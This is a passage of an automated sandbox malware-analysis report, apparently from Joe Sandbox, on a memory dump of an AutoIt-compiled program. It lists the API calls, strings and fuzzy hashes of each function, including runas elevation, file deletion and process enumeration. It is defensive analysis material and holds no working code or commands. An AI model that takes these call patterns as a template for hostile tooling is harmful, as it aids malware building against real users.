MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00953CB0
SetCurrentDirectoryW.KERNEL32(?,009E2418,?,?,?,?,?,?,?,00913368,?), ref: 00953CF1
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,009D31F4,009E2418,?,?,?,?,?,?,?,00913368), ref: 00953D7A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00953D81

Part of subcall function 009134D3: GetSysColorBrush.USER32(0000000F), ref: 009134DE
Part of subcall function 009134D3: LoadCursorW.USER32(00000000,00007F00), ref: 009134ED
Part of subcall function 009134D3: LoadIconW.USER32(00000063), ref: 00913503
Part of subcall function 009134D3: LoadIconW.USER32(000000A4), ref: 00913515
Part of subcall function 009134D3: LoadIconW.USER32(000000A2), ref: 00913527
Part of subcall function 009134D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0091353F
Part of subcall function 009134D3: RegisterClassExW.USER32(?), ref: 00913590

Part of subcall function 009135B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009135E1
Part of subcall function 009135B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00913602
Part of subcall function 009135B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00913368,?), ref: 00913616
Part of subcall function 009135B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00913368,?), ref: 0091361F

Part of subcall function 0091396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00913A3C

Strings

It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00953CAA
runas, xrefs: 00953D75
AutoIt, xrefs: 00953CA5

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-2030392706
Opcode ID: 81b0edc01a611392199690d683ae087e843f7d678a5e86a13865ac1b01c319f0
Instruction ID: 39d797a3ffaed29c42f46fa1187dfeb3580adba73d39ce803e4cd43bf9a6a031
Opcode Fuzzy Hash: 81b0edc01a611392199690d683ae087e843f7d678a5e86a13865ac1b01c319f0
Instruction Fuzzy Hash: 6E51E53024C388AAC716EB61DC51EEA7BBD9FD5744F008429F482561F2DB648A89E762

Function 0097DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00915851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009155D1,?,?,00954B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00915871

Part of subcall function 0097EAB0: GetFileAttributesW.KERNEL32(?,0097D840), ref: 0097EAB1

FindFirstFileW.KERNEL32(?,?), ref: 0097DCCB
DeleteFileW.KERNEL32(?,?,?,?), ref: 0097DD1B
FindNextFileW.KERNELBASE(00000000,00000010), ref: 0097DD2C
FindClose.KERNEL32(00000000), ref: 0097DD43
FindClose.KERNEL32(00000000), ref: 0097DD4C

Strings

\*.*, xrefs: 0097DC9D

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 27ab9828adcbbe50b226fd1e876c0c521546aa147f492b72fd87a1692ffff3ba
Instruction ID: f55f11ad26e3b661cb9d50924c7aab7bcbfa8e34641ec7091a68b6eb3813bee7
Opcode Fuzzy Hash: 27ab9828adcbbe50b226fd1e876c0c521546aa147f492b72fd87a1692ffff3ba
Instruction Fuzzy Hash: 99316F3211D3499BC305EB60D881AEFB7EDBED6304F444D5DF8D682191EB21D909DB92

Function 0097DD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0097DDAC
Process32FirstW.KERNEL32(00000000,?), ref: 0097DDBA
Process32NextW.KERNEL32(00000000,?), ref: 0097DDDA
CloseHandle.KERNEL32(00000000), ref: 0097DE87

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 5102bc0622e56a39290507687bd25550f91c8512c7244d5f8bbe66a850a4216d
Instruction ID: 1d8d454774a7e5a03e04d08bb6d7ec6937a4e7e40018bd309b253add7212c5ff
Opcode Fuzzy Hash: 5102bc0622e56a39290507687bd25550f91c8512c7244d5f8bbe66a850a4216d
Instruction Fuzzy Hash: 0F318D721082049FC305EF50D885BAABBF8AFD9340F04092DF586861A1DB71A985CB92

Function 0092FFE0 Relevance: 3.1, APIs: 2, Instructions: 94nativeCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 0093007D
NtProtectVirtualMemory.NTDLL ref: 0093008F

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CloseHandleMemoryProtectVirtual
String ID:
API String ID: 2407445808-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 0a886e4cd47b4cd575de55c75ebe02e752c393c57c2e33cd71cb53501659bfac
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: F631B271A00105DFD718DF58D4A0A69FBAAFB99300F2486A5E44ACB652D736EDC1CFC0

Function 0091EE56 Relevance: 21.6, APIs: 14, Instructions: 613windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0091EF07
timeGetTime.WINMM ref: 0091F107
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0091F228
TranslateMessage.USER32(?), ref: 0091F27B
DispatchMessageW.USER32(?), ref: 0091F289
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0091F29F
Sleep.KERNEL32(0000000A), ref: 0091F2B1

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: a95aa66c8ec72d588c395e3073cb54159d03b1ae6ee2c54b233aa63ae30f19af
Instruction ID: 334a64448ed98682441588a3a9a0dc1a3502a24da82c701c6a54ffc4c32f2cee
Opcode Fuzzy Hash: a95aa66c8ec72d588c395e3073cb54159d03b1ae6ee2c54b233aa63ae30f19af
Instruction Fuzzy Hash: 3532E43070834AEFD728CF24C894BAAB7E9BF85304F14896DF56587291C775E984DB82

Function 00913624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00913657
RegisterClassExW.USER32(00000030), ref: 00913681
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00913692
InitCommonControlsEx.COMCTL32(?), ref: 009136AF
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009136BF
LoadIconW.USER32(000000A9), ref: 009136D5
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009136E4

Strings

+, xrefs: 00913640
TaskbarCreated, xrefs: 00913687
0, xrefs: 00913639
AutoIt v3 GUI, xrefs: 00913673

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 767e150cb6f9d7b80d07758053bf05abca740a4d71ac68d15dadfe55dae12919
Instruction ID: 522db962c0a51519840180d9959d140e9863f2e62f34dae1517b588fd0fc74df
Opcode Fuzzy Hash: 767e150cb6f9d7b80d07758053bf05abca740a4d71ac68d15dadfe55dae12919
Instruction Fuzzy Hash: 3F211AB1D2A358AFDB04DF94ED89BDDBBB8FB09710F10511AF512AA2A0D7B44540EF90

Function 009509DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0095071A: CreateFileW.KERNEL32(00000000,00000000,?,00950A84,?,?,00000000,?,00950A84,00000000,0000000C), ref: 00950737

GetLastError.KERNEL32 ref: 00950AEF
__dosmaperr.LIBCMT ref: 00950AF6
GetFileType.KERNEL32(00000000), ref: 00950B02
GetLastError.KERNEL32 ref: 00950B0C
__dosmaperr.LIBCMT ref: 00950B15
CloseHandle.KERNEL32(00000000), ref: 00950B35
CloseHandle.KERNEL32(?), ref: 00950C7F
GetLastError.KERNEL32 ref: 00950CB1
__dosmaperr.LIBCMT ref: 00950CB8

Strings

H, xrefs: 00950C3D

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 7ad8e6fe17c306ff2ed4c45bea9a29a53b49848312c3806555863eaaabcc99ad
Instruction ID: a2873fb69ed70687666644082ab17e4d5b3189514684d764e112e10f052c2808
Opcode Fuzzy Hash: 7ad8e6fe17c306ff2ed4c45bea9a29a53b49848312c3806555863eaaabcc99ad
Instruction Fuzzy Hash: 26A138329141488FCF19EF68D892BAE3BA4EB8A325F140159FC11DF2D1DB359C16CB91

Function 009152A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00915594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00954B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 009155B2

Part of subcall function 00915238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0091525A

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 009153C4
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00954BFD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00954C3E
RegCloseKey.ADVAPI32(?), ref: 00954C80
_wcslen.LIBCMT ref: 00954CE7
_wcslen.LIBCMT ref: 00954CF6

Strings

\Include\, xrefs: 00915381
\, xrefs: 00954CFC
Include, xrefs: 00954BF4, 00954C35
Software\AutoIt v3\AutoIt, xrefs: 009153BA

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: ffe94fb6953a671c837ec3af93362b991eae325f186ceffa66a26605e9f7167e
Instruction ID: f1c65fbc4ff40046b124daa1cae35fe39dadb101a531bb373aaa30bb33fbf448
Opcode Fuzzy Hash: ffe94fb6953a671c837ec3af93362b991eae325f186ceffa66a26605e9f7167e
Instruction Fuzzy Hash: 9271A0715193449AC314EF65DC85EEBBBE8FFC9340F80842DF445871A0EB719A89DB92

Function 009134D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 009134DE
LoadCursorW.USER32(00000000,00007F00), ref: 009134ED
LoadIconW.USER32(00000063), ref: 00913503
LoadIconW.USER32(000000A4), ref: 00913515
LoadIconW.USER32(000000A2), ref: 00913527
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0091353F
RegisterClassExW.USER32(?), ref: 00913590

Part of subcall function 00913624: GetSysColorBrush.USER32(0000000F), ref: 00913657
Part of subcall function 00913624: RegisterClassExW.USER32(00000030), ref: 00913681
Part of subcall function 00913624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00913692
Part of subcall function 00913624: InitCommonControlsEx.COMCTL32(?), ref: 009136AF
Part of subcall function 00913624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009136BF
Part of subcall function 00913624: LoadIconW.USER32(000000A9), ref: 009136D5
Part of subcall function 00913624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009136E4

Strings

0, xrefs: 0091355F
#, xrefs: 00913566
AutoIt v3, xrefs: 0091357F

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: d308d4b1d0c56f1a882e5d9bd311ed6784aec4c2fe3103e3088a784e7b8c229c
Instruction ID: 9f0a1db969110325905d705503221b7175adf4521a4233732f7f6ebbd0ff4b5f
Opcode Fuzzy Hash: d308d4b1d0c56f1a882e5d9bd311ed6784aec4c2fe3103e3088a784e7b8c229c
Instruction Fuzzy Hash: E2218370D65398ABDB108F95EC85B997FF8FB09B40F00501AF605AA260C7B94944EF80

Function 00990FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 00991019
inet_addr.WSOCK32(?), ref: 00991079
gethostbyname.WS2_32(?), ref: 00991085
IcmpCreateFile.IPHLPAPI ref: 00991093
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00991123
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00991142
IcmpCloseHandle.IPHLPAPI(?), ref: 00991216
WSACleanup.WSOCK32 ref: 0099121C

Strings

Ping, xrefs: 009910D3

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 6d650709f494a9f1e2e33420998ea65ff2f36f6d7dc7d35eeb402058b12c6211
Instruction ID: 2c8d14d4c7d8e510dcbde29959c84f5b8f1056066624793cec21d4f51f7bb1e6
Opcode Fuzzy Hash: 6d650709f494a9f1e2e33420998ea65ff2f36f6d7dc7d35eeb402058b12c6211
Instruction Fuzzy Hash: DB91B471608202AFDB20DF19C884F16BBE4FF89318F148599F5698B7A2C735ED85CB81

Function 0091370F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00913709,?,?), ref: 00913777
KillTimer.USER32(?,00000001,?,?,?,?,?,00913709,?,?), ref: 009137A3
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 009137C6
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00913709,?,?), ref: 009137D1
CreatePopupMenu.USER32 ref: 009137E5
PostQuitMessage.USER32(00000000), ref: 00913806

Strings

TaskbarCreated, xrefs: 009137CC

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: cb5798e6e73871750977920f307865397512e6a51700801662c1aa9a0f12820a
Instruction ID: f3ec2ae6e77cc66b49721ad20b952eb956218613425bfaa980f05633909f3af1
Opcode Fuzzy Hash: cb5798e6e73871750977920f307865397512e6a51700801662c1aa9a0f12820a
Instruction Fuzzy Hash: CC41EBF131828CBBDB196B289D897F93BBDEB41300F40C125F502895E1DAA49F88A761

Function 009490C5 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55be65c048ee63ef51fbfb1b99d4d893708dfbc394d496b42c9249fc0b9ffe58
Instruction ID: a2f89b22b43c1f51040da88d99a35eedc4d2a01e34926d5417ebbdecad6249d9
Opcode Fuzzy Hash: 55be65c048ee63ef51fbfb1b99d4d893708dfbc394d496b42c9249fc0b9ffe58
Instruction Fuzzy Hash: CDC1D170D08249AFDF11DFA8D841FAEBBB4AF4A310F144199E554AB3E2C7349D42CB61

Function 0092AC3E Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d1r0,2, xrefs: 0092ACA9
i, xrefs: 0092B0A3
d0b, xrefs: 0092AC96, 0092AD10, 0092AEA7
d5m0, xrefs: 0092AE75
d1b, xrefs: 0092AD55, 0092AE8E
d10m0, xrefs: 0092ACF0

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID:
String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
API String ID: 0-4285391669
Opcode ID: 1cf1dd1acb49d0b926576e8b373a09558ba7298f066d7ea2e29d16c2dcb676c8
Instruction ID: d5428ecdc7bdece99048ad3346a95e3f446ba4e86123e19e7e384ad936cb10a0
Opcode Fuzzy Hash: 1cf1dd1acb49d0b926576e8b373a09558ba7298f066d7ea2e29d16c2dcb676c8
Instruction Fuzzy Hash: AF6237706083458FC724DF14D095AAABBE5FFC9304F14896EE89A8B352DB71E945CF82

Function 009135B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009135E1
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00913602
ShowWindow.USER32(00000000,?,?,?,?,?,?,00913368,?), ref: 00913616
ShowWindow.USER32(00000000,?,?,?,?,?,?,00913368,?), ref: 0091361F

Strings

AutoIt v3, xrefs: 009135D9, 009135DE, 009135DF
edit, xrefs: 009135FC

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 5966e681c14c37b34abf4ec4cf3d9788171046ac2a07404a77bdcc1c3933af60
Instruction ID: f2ab9782740f1499726e206aa1b82181e96f59026a6337b50c45b0da40cbdb62
Opcode Fuzzy Hash: 5966e681c14c37b34abf4ec4cf3d9788171046ac2a07404a77bdcc1c3933af60
Instruction Fuzzy Hash: 28F03A706692D47AE73507136C88E372EBDD7C7F10B00101EB904AB5A0D2690C41EEB0

Function 009161A9 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 122
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00955287

Part of subcall function 00918577: _wcslen.LIBCMT ref: 0091858A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00916299

Strings

Line %d: , xrefs: 00955305
AutoIt - , xrefs: 0091620D
]], xrefs: 009552CF, 009552D8, 009552E3, 009552F1, 009552DC, 009552E7

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
